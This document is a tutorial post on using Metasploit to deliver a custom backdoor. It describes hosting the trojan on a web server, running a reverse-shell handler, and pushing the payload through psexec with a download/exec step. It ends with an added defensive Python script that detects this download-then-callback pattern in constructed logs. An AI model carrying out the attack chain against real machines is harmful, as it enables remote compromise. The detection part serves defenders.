Payload Customization with Metasploit
- Set up a website from which the victim can download your custom Trojan/Backdoor.
- Set up a Metasploit handler to receive the connection from your custom backdoor.
- Create an exploit to deliver your custom payload.
“set payload windows/meterpreter/reverse_tcp”
If it is a command prompt, then you would type
“set payload windows/shell/reverse_tcp”
My Python backdoor sends a command prompt, so I'll use:
“windows/shell/reverse_tcp”
This “single” payload doesn’t use a stager and expects a connection from a shell. Do not confuse this with “windows/shell_reverse_tcp”, which expects a connection from a stager, not a shell.
For a better understanding, check my write-ups on:
https://www.cybrary.it/0p3n/metasploit-advanced/
https://www.cybrary.it/0p3n/metasploit-advanced-part-ii/
https://www.cybrary.it/0p3n/metasploit-advanced-part-iii/
Let's continue...
Set lhost to 127.0.0.1 and set your lport to something like 80, as my payload is set to send a command prompt to port 80. Start the multi-handler as a background task. You can use the “-j” option, which starts the multi-handler as a “job” that runs in the background.
3 - Exploit and deliver the payload
With your handler in the background waiting to receive a connection, you’re ready to exploit the target. I’ll use PSEXEC. Initially, I use “windows/smb/psexec” and set it up with the correct user and password for the target. Then, I set my payload: “set PAYLOAD download/exec”
The options are simple. You set the URL to point to the custom payload on your web server from step 1. You can change the name of the file that will be saved to the target if you like. Finally, type “exploit” and you'll see it download from your website. A shell will appear in your handler.
Please note: for those who want a greater understanding of PSEXEC, I'll cover this in my next write-up.
Stay Linked!!!
Ali Tabish
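The delivery chain described above leaves a defender two things to look for: an executable fetched over HTTP from an external host followed shortly by a fresh, non-HTTP connection from the same internal host back to that same address (the download/exec stage, then the shell calling home), and a connection to TCP/80 whose first client bytes are a command prompt banner rather than an HTTP request line. The script below is an added example, not code from the write-up, from Cybrary or from Metasploit; the proxy and flow log formats, IP addresses, timestamps and hex payloads are all constructed for the example.

```python
"""Defender-side checks for an HTTP executable download followed by a
non-HTTP callback, and for raw (non-HTTP) traffic on TCP/80.
Added example; the telemetry below is constructed, not real."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# Constructed sample telemetry. Whitespace-separated fields:
#   proxy: <utc-time> <src-ip> <dst-ip> <dst-port> <url> <content-type> <status>
#   flow:  <utc-time> <src-ip> <dst-ip> <dst-port> <first-client-bytes-hex>
PROXY_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 203.0.113.9 80 http://203.0.113.9/update.exe application/x-msdownload 200
2024-05-01T10:00:02Z 10.0.0.7 203.0.113.20 80 http://203.0.113.20/index.html text/html 200
"""
FLOW_LOG = """\
2024-05-01T10:00:00Z 10.0.0.5 203.0.113.9 80 474554202f7570646174652e65786520485454502f312e31
2024-05-01T10:00:03Z 10.0.0.7 203.0.113.20 80 474554202f20485454502f312e31
2024-05-01T10:00:09Z 10.0.0.5 203.0.113.9 80 4d6963726f736f66742057696e646f7773205b56657273696f6e
2024-05-01T10:05:00Z 10.0.0.8 203.0.113.30 80 474554202f6c6f676f2e706e6720
"""

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ",
                b"CONNECT ", b"PATCH ", b"TRACE ")
EXECUTABLE_TYPES = {"application/x-msdownload", "application/x-dosexec"}
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr")
Pair = Tuple[str, str]  # (internal source IP, external destination IP)


@dataclass
class ProxyEvent:
    time: datetime
    src: str
    dst: str
    port: int
    url: str
    content_type: str
    status: int


@dataclass
class Flow:
    time: datetime
    src: str
    dst: str
    port: int
    first_bytes: bytes


def _ts(text: str) -> datetime:
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ")


def parse_proxy(text: str) -> List[ProxyEvent]:
    events = []
    for line in text.splitlines():
        t, src, dst, port, url, ctype, status = line.split()
        events.append(ProxyEvent(_ts(t), src, dst, int(port), url, ctype, int(status)))
    return events


def parse_flows(text: str) -> List[Flow]:
    flows = []
    for line in text.splitlines():
        t, src, dst, port, first_hex = line.split()
        flows.append(Flow(_ts(t), src, dst, int(port), bytes.fromhex(first_hex)))
    return flows


def is_http_request(first_bytes: bytes) -> bool:
    """True if the client's opening bytes look like an HTTP request line."""
    return first_bytes.startswith(HTTP_METHODS)


def looks_like_executable(event: ProxyEvent) -> bool:
    """A successful fetch whose content type or path says 'Windows executable'."""
    if event.status != 200:
        return False
    path = urlparse(event.url).path.lower()
    return event.content_type in EXECUTABLE_TYPES or path.endswith(EXECUTABLE_SUFFIXES)


def download_then_callback(events: List[ProxyEvent], flows: List[Flow],
                           window: timedelta = timedelta(seconds=60)) -> List[Pair]:
    """Executable download followed, within `window`, by a new non-HTTP connection
    from the same host to the same external address. The download connection
    itself starts before the proxy records completion and begins with an HTTP
    request line, so it is excluded by both conditions."""
    hits = []
    for ev in events:
        if not looks_like_executable(ev):
            continue
        for fl in flows:
            if (fl.src, fl.dst) != (ev.src, ev.dst):
                continue
            if ev.time < fl.time <= ev.time + window and not is_http_request(fl.first_bytes):
                hits.append((ev.src, ev.dst))
                break
    return hits


def non_http_on_80(flows: List[Flow]) -> List[Pair]:
    """Connections to TCP/80 whose first client bytes are not an HTTP request."""
    return [(f.src, f.dst) for f in flows if f.port == 80 and not is_http_request(f.first_bytes)]


def run(proxy_text: str = PROXY_LOG, flow_text: str = FLOW_LOG) -> Dict[str, List[Pair]]:
    events, flows = parse_proxy(proxy_text), parse_flows(flow_text)
    return {"download_then_callback": download_then_callback(events, flows),
            "non_http_on_80": non_http_on_80(flows)}


if __name__ == "__main__":
    for rule, pairs in run().items():
        for src, dst in pairs:
            print(f"{rule}: {src} -> {dst}")
```

In the constructed data only 10.0.0.5 trips both rules: it fetches `update.exe` from 203.0.113.9 and, eight seconds later, opens a second connection to the same address whose first bytes are the `Microsoft Windows [Version` banner of a command prompt. The two rules are independent on purpose: the first still fires if the operator picks a port other than 80 for the callback, and the second still fires if the executable arrives by some path the proxy never sees.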